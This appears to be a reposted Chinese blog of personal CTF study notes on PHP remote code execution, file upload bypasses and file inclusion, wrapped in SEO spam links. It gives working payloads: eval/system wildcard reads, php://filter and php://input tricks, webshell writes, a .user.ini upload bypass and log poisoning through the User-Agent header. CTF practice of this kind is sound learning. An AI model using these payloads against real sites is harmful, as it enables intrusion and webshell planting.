当前位置: 首页 > wzjs >正文

美观网站建设哪家好软件外包开发

美观网站建设哪家好,软件外包开发,实训课做一个网站怎么做,简历模板网站有哪些RCE 第一题 eval代码执行 : 1、使用system 加通配符过滤 ?csystem("tac%20fl*") ; 2、反字节执行 xxx %20 echo 反字节 3、变量转移 重新定义一个变量 让他代替我们执行 4、伪协议玩法 ?cinclude$_GET[1]?>&1php://filter/readc…

RCE

第一题

eval代码执行 : 1、使用system 加通配符过滤

?c=system("tac%20fl*") ;

2、反字节执行      `xxx`

%20

echo + 反字节

3、变量转移

重新定义一个变量 让他代替我们执行

4、伪协议玩法

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

或者直接写入木马 file_put_contents(11.php,"<?php eval($_POST['cmd'])?>");

5、拷贝

?c=system("cp fla* 1.txt")

访问1.txt

复习完练习一个

代码执行

当然还是可以使用伪协议

复习之

文件上传漏洞

ctfshow练习

看介绍是前端的验证 :

玩法 :欺骗前端验证

使用gzl生成一个

改为 jpg后缀 之后上传

知道密码之后如果木马是post方式的传输就能使用这个post口直接进行传输

2、

后端的验证要严密 :

为了防止后端验证文件头 所以写个假的文件头 让它去验证

利用第一个的老套路居然上传成功了这是我没想到的

3、黑名单绕过 :

我们上传的文件只有png能上传成功说明是后端的waf

改一下ini为png后缀一会再改名 .user.ini

写入 :

auto_prepend_file=shell.png

上传一个 木马文件 shell.png

记住在 /upload下执行命令

文件包含

主要涉及到文件的读取,写入,代码执行

1个题全部展示

文件的读取 :

file=php://filter/read=convert.base64-encode/resource=flag.php

把这个base64解密就出来了

2、文件的写入

换一个单词就能用

在post中写入就行 但是这个的条件是有 file_put_contents

这个好用:

php://input

POST <?php fputs(fopen("shell.php","w") , '<?php @eval($_POST["pass"])?>')?>

文件的写入在ctf中非常麻烦所以不常用 同时上边文件的读取不知道 flag 的位置瞎猜也是非常难受 所以下边这个 命令执行非常牛x

3、命令执行

上边的写入其实就是命令的执行啊

php://input 加post就是这种

写上之后就能执行命令了很强

再一个就是 data 协议

利用data协议实现代码执行

使用加密

还有一个就是 文件包含的唯一真神 只要看着一堆 waf 绕不过了 直接使用

非常不吃操作

只需要记住 不同2个中间件的日志

apache : /www/log/apache/access.log

nginx : /www/log/nginx/access.log

怎么判断是哪个?

根据报错发现我们的路径错误了

抓个包 改一下这个ua头信息为恶意的木马

就成功注入了


文章转载自:

http://CQLk5xTm.pbzLh.cn
http://8KUtFKB4.pbzLh.cn
http://qJo49aP5.pbzLh.cn
http://ImIHUCw1.pbzLh.cn
http://3O48DsOi.pbzLh.cn
http://cFLLQYin.pbzLh.cn
http://2opxjVDZ.pbzLh.cn
http://WTqhzoNe.pbzLh.cn
http://GsfXxGTH.pbzLh.cn
http://73X4avpO.pbzLh.cn
http://OWyF2b8Q.pbzLh.cn
http://boTJHaZU.pbzLh.cn
http://Y5czytEf.pbzLh.cn
http://1F1FdNuy.pbzLh.cn
http://KQo4EdOs.pbzLh.cn
http://2Cw3ISvL.pbzLh.cn
http://y4rA7dzX.pbzLh.cn
http://bmtbiY01.pbzLh.cn
http://wnLlzCdY.pbzLh.cn
http://Wc2DtjCa.pbzLh.cn
http://Ga2VhqkY.pbzLh.cn
http://QREJC8WN.pbzLh.cn
http://mH2WN04p.pbzLh.cn
http://wINcUm3I.pbzLh.cn
http://pahO8rLa.pbzLh.cn
http://qUMYvLd9.pbzLh.cn
http://lut3U0OE.pbzLh.cn
http://wDFzXeYe.pbzLh.cn
http://3A7TN8X0.pbzLh.cn
http://oMuCCq3G.pbzLh.cn
http://www.dtcms.com/wzjs/755440.html

相关文章:

  • 哈尔滨网站优化方式邢台做移动网站的公司
  • 吉林市哪有做网站的centos7搭建wordpress
  • 做钓鱼网站原理网站搭建介绍
  • 构建 物流网宁波seo教程行业推广
  • wordpress 禅意主题湖南网站seo营销
  • 宜州市住房保障和城乡建设局网站y1s华硕wordpress
  • 网站要精细是什么意思免费公司网站模板
  • 南京网站建设费用东风多利卡道路清障车做网站
  • 上海市建设安全协会网站一360响应式网页设计原理
  • 网站手机pc同步企业邮箱账号是什么
  • 衡水企业网站建设费用如何创建网站站点并且避免广告
  • 网络促销分类 网站促销网站关键词优化是什么
  • 公司网站是用什么软件做建设工程许可证在那个网站办
  • 外贸网站如何优化东莞主页网站制作
  • 自助建站什么意思国外虚拟主机 两个网站
  • 网站开发项目的简介在线设计平台行业环境
  • 光明新区住房和建设局网站如何在虚拟主机一键安装wordpress
  • 我要发布文章到网站上推广 哪些网站最好公司网站建设费用怎么入账
  • 企业网站建设的一般要素品牌战略咨询
  • 网站改版声明网站开发德菁
  • 找公司做网站需要咨询什么问题做网站关键字
  • 网站首页设计代码李宁网站开发ppt模板
  • 网站开发服务费入什么科目贵阳网站制作公司
  • 企业平台网站建设方案学做实体店网站
  • 美发企业网站模板如何做个盈利的网站
  • 网站的流量是怎么算的wordpress制作表单
  • 已有域名 搭建网站河北廊坊建设局网站
  • notepad做网站广州sem代运营推广公司
  • 海南网站建设多少钱网页制作平台哪个最好
  • 泰拳图片做网站用网站建设与制作过程